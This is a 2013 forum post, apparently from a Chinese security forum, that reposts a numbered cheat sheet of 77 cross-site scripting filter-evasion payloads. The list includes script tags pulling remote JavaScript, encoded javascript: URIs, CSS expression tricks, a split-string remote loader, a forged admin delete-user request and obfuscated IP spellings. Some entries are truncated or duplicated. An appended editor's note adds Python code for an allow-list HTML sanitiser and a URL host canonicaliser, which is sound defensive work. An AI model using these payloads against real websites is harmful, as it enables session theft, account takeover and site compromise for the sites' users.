Views: 3538 | Replies: 0

XSS Attack Roundup

OP, posted on 2013-4-19 19:22:37
There seems to be little XSS material on t00ls, so when I saw something good I copied it over; not sure whether any of you need to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Corrected defective IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters are basically ineffective domestically, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta before the IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping filtered JavaScript
\";alert('XSS');//
(30) Closing the Title tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">
(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression_r(alert('XSS'))">
(50) Anonymous STYLE (made of an opening angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag; you can embed FLASH that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript in Flash, you can mix your XSS code in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can add JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP in decimal
<A HREF="http://3232235521">XSS</A>
(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14
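Editor's note, added here and not part of the post or its fuzzexp.org source: almost every entry above from (3) to (46) and (61) to (67) works only against a filter that pattern-matches the raw markup for strings like `javascript:` or `<script`. The defensive counterpart is to parse the HTML, keep an allow-list of tags and attributes, and normalise every URL-valued attribute the way a browser would (entity decoding with or without semicolons, removal of embedded tab/newline/NUL, trimming of leading control characters) before checking its scheme. The example below does that with the Python standard library only; the tag and attribute allow-lists, the function names and the sample inputs are assumptions made for this example.

```python
"""Allow-list HTML sanitiser: parse, normalise URL attributes, re-serialise.
Standard library only. Allow-lists below are this example's assumption for a
small comment-style fragment, not a recommendation for any specific product."""
import html
import re
from html.parser import HTMLParser

# Tags we pass through, with the attributes permitted on each (assumed).
ALLOWED_TAGS = {"a": {"href", "title"}, "img": {"src", "alt"}, "b": set(),
                "i": set(), "p": set(), "ul": set(), "li": set(), "br": set()}
VOID_TAGS = {"img", "br"}
URL_ATTRS = {"href", "src"}
ALLOWED_SCHEMES = {"http", "https", "mailto"}
# Tags whose text content must be discarded, not merely unwrapped.
RAW_TEXT_TAGS = {"script", "style"}


def normalize_url(value):
    """Undo what browsers forgive: entities (with or without ';'), embedded
    tab/newline/CR/NUL, and leading/trailing control or space characters."""
    v = html.unescape(value)
    v = re.sub(r"[\t\n\r\x00]", "", v)       # removed anywhere, as browsers do
    return v.strip("".join(chr(c) for c in range(0x21)) + "\u00a0\ufeff\u3000")


def url_scheme(value):
    """Lower-cased scheme of a URL, or None for a relative URL."""
    m = re.match(r"([a-zA-Z][a-zA-Z0-9+.\-]*):", normalize_url(value))
    return m.group(1).lower() if m else None


def is_safe_url(value):
    scheme = url_scheme(value)
    return scheme is None or scheme in ALLOWED_SCHEMES


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []        # serialised output pieces
        self.open = []       # stack of allowed, non-void tags still open
        self.skip = None     # raw-text tag whose content is being discarded

    def handle_starttag(self, tag, attrs):
        if self.skip:
            return
        if tag in RAW_TEXT_TAGS:
            self.skip = tag              # drop <script>/<style> and their body
            return
        if tag not in ALLOWED_TAGS:
            return                       # unknown tag: drop tag, keep its text
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag] or value is None:
                continue
            if name in URL_ATTRS and not is_safe_url(value):
                continue                 # javascript:/vbscript:/data: etc.
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID_TAGS:
            self.open.append(tag)

    def handle_endtag(self, tag):
        if self.skip:
            if tag == self.skip:
                self.skip = None
            return
        if tag in self.open:
            while True:                  # close anything left open inside it
                t = self.open.pop()
                self.out.append("</%s>" % t)
                if t == tag:
                    break

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data, quote=False))

    def result(self):
        self.close()
        while self.open:                 # balance tags the input left open
            self.out.append("</%s>" % self.open.pop())
        return "".join(self.out)


def sanitize_html(fragment):
    s = Sanitizer()
    s.feed(fragment)
    return s.result()


if __name__ == "__main__":
    # Constructed samples modelled on items (3), (11), (20) and (77) above.
    for sample in ('<IMG SRC=javascript:alert(1)>',
                   '<a href="jav&#x09;ascript:alert(1)">x</a>',
                   '<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>ok',
                   '<a href="http://3w.org/">link</a>'):
        print(repr(sample), "->", repr(sanitize_html(sample)))
```

The check rejects by scheme rather than by searching for `javascript`, so the case, whitespace and entity variants in items (4) through (14) all collapse to the same rejected value; relative URLs and scheme-relative `//host/` forms pass, which is why the host canonicalisation below is still needed.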
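A second added example, again the editor's and not from the post: items (70) to (76) spell one host as a decimal integer, dotted hex, dotted octal, a mixed form with embedded whitespace, and a trailing-dot DNS name. Any link allow-list, redirect check or log correlation that compares hostnames as strings is defeated by these spellings. The helper below canonicalises a URL's host before comparison, following the WHATWG URL IPv4 parsing rules (each dot-separated piece may be hex with `0x`, octal with a leading `0`, or decimal, and the last piece fills the remaining bytes); the function names and sample inputs are assumptions for this example.

```python
"""Canonicalise URL hosts so obfuscated IPv4 spellings and trailing-dot
names compare equal to the plain form a rule expects. Standard library only."""
import re
from urllib.parse import urlsplit


def _ipv4_number(part):
    """Parse one dot-separated piece as browsers do: 0x.. hex, leading-0
    octal, otherwise decimal. Raises ValueError for anything else."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]*", part):
        return int(part[2:] or "0", 16)
    if not re.fullmatch(r"[0-9]+", part):
        raise ValueError(part)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def canonical_ipv4(host):
    """Dotted-quad form of any browser-accepted IPv4 spelling, or None if the
    host is not an IPv4 address at all."""
    parts = host.split(".")
    if len(parts) > 1 and parts[-1] == "":
        parts.pop()                         # tolerate a trailing dot
    if not 1 <= len(parts) <= 4:
        return None
    try:
        numbers = [_ipv4_number(p) for p in parts]
    except ValueError:
        return None
    if any(n > 255 for n in numbers[:-1]):
        return None
    if numbers[-1] >= 256 ** (5 - len(numbers)):
        return None                         # last piece spans the remaining bytes
    value = numbers[-1]
    for i, n in enumerate(numbers[:-1]):
        value += n * 256 ** (3 - i)
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def canonical_host(url):
    """Host of a URL in canonical form: tab/newline/CR removed, lower-cased,
    trailing dot dropped, IPv4 rendered as dotted-quad. None if no host."""
    url = re.sub(r"[\t\n\r]", "", url)      # browsers drop these anywhere
    host = urlsplit(url).hostname            # already lower-cased
    if not host:
        return None
    host = host.rstrip(".")
    return canonical_ipv4(host) or host


if __name__ == "__main__":
    # Constructed samples taken from the spellings in items (70)-(76).
    for u in ("http://3232235521/", "http://0xc0.0xa8.0x00.0x01/",
              "http://0300.0250.0000.0001/", "http://6\t6.000146.0x7.147/",
              "http://www.google.com./", "//www.google.com/"):
        print(repr(u), "->", canonical_host(u))
```

Compare allow-lists against `canonical_host()` output on both sides, and canonicalise before logging as well, so that the decimal, hex and octal forms of one address end up as one key in detection rules rather than four.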